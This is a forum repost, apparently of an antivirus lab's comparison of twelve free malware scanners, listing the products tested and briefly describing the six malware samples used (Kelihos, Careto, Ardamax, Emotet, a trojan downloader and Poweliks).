Tested software:
- Arcabit Skaner Online 1.0.4
- ClamWin Free Antivirus * 0.99.1
- Comodo with Cleaning Essentials 2.5.242177.201
- Dr.Web CureIt! 11.1.2
- Emsisoft Emergency Kit 11.9.0.6508
- ESET Online Scanner 2.0.12.0
- Kaspersky Virus Removal Tool 15.0.19.0
- Malwarebytes Antimalware Free 2.2.1.1043
- Panda Cloud Cleaner 1.1.9
- Sophos Clean (dawniej HitmanPro) 3.7.13.262
- Trend Micro HouseCall (1.62)
- Windows Defender * 4.10.14393.0
* CLAMWIN FREE ANTIVIRUS I WINDOWS DEFENDER PROVIDES
REAL-TIME PROTECTION, BUT WE DIDN’T TAKE IT INTO ACCOUNT.
DURING SCAN, PROTECTION HAS BEEN DISABLED.
Curing infected system
+ a sample was detected or operating system was cured
- a sample was undetectable for tested solution
* SOMETIMES THE SCANNER REQUIRED OPERATING SYSTEM REBOOT IN ORDER TO REMOVE THREAT.
IN THOSE TWO CASES, INFECTION WAS REMOVED ONLY IN RESCUE MODE.
sample A:
backdoor Kelihos — causes the infected workstation to send
spam, steal sensitive information, download and run other infected files
including trojans. Infected bot uses P2P connection to communicate with
other zombie computers. I decentralized network, infected machine can
operate as client or server C2 receiving and sending commands from
control and management system.
sample B:
backdoor Careto — includes highly sophisticated malicious
software consisting of a rootkit and bootkit. Observed by researches
variations shows, that all version of this malware are indented for 32-
and 64-bit Mac OS X, Linux, Windows and (probably) Android and iOS
(also BlackBerry OS – unconfirmed information) systems. Because of its
capabilities, Backdoor Careto (sometimes called The Mask) is believed to
be the work of a nation state.
Backdoor Careto can capture network traffic, keystrokes, Skype
conversation, PGP keys. It’s able to analyze WiFi traffic, monitor all file
operations, collect a list of documents from infected system, including
encryption keys, VPN configuration, SSH keys and RDP files. In terms of
sophistication, Backdoor Careto is one of the most advanced APT
threats.
sample C:
keylogger Ardamax — commercial spyware, which was used in
one of the social engineering campaign “the bailiff” aimed toward Polish
citizens. With this tool it is possible to automatically send collected logs
and data to any e-mail address or FTP account.
Keylogger Ardamax can: record keystrokes, save web browser history,
capture video and sound from web camera, intercept text from clipboard,
monitor AIM, Windows Live Messenger, ICQ, Skype, Yahoo Messenger,
Google Talk, Miranda and QiP communicators. Stored information can be
send to indicated e-mail address or FTP account.
sample D:
trojan Emotet — stores its files in system registry to hide from
antivirus software. Trojan Emotet with modular design contains: its own
installer, a banking module, an anti-spam bot, a module for stealing
contacts from popular email clients (is able to spread, can steal addresses
from email clients and send the same spam messages to victims from a
contact list), module for DDoS attacks (Nitol DDoS bot).
Trojan Emotet contains a list of popular banks. If infected user visits one
of the defined URLs, Emotet records all data send between user and
website – even if website is encrypted with HTTPS protocol.
sample E:
trojan downloader — as the name suggests, trojan downloader
contains malicious and potentially unwanted software, which is
downloaded and installed on infected system. Downloaded in this way
dropper file installs a appropriate virus, which can then be used for
different purposes.
Dropper files are often used to carry known trojans, because it is much
easier to create dropper file than completely new trojan, which antivirus
software won’t be able to detect.
In the test, we used Trojan, which creates few files on disk. One of them
downloads additional malicious software.
sample F:
trojan Poweliks — uses a vulnerability in Microsoft Word and
with a maliciously crafted Word document, which is distributed via email,
installs additional code, that is a PowerShell script encoded in
Base64 triggering and executing a low-level program (shellcode) written
in assembler. In the final stage, shellcode executes binary program, which
tries to communicate with encoded IP addresses to receive futher
commands from C&C servers.
Trojan Powerliks can be used to download and execute files. Its actions
are stored in the registry – it doesn’t create any file on the hard disk, so
to detect this threat, it’s required to recognize infected Word document
or protect / scan registry.
More info: https://avlab.pl/sites/default/f ... alware_scanners.pdf |
发表于 2017-2-20 18:45:02
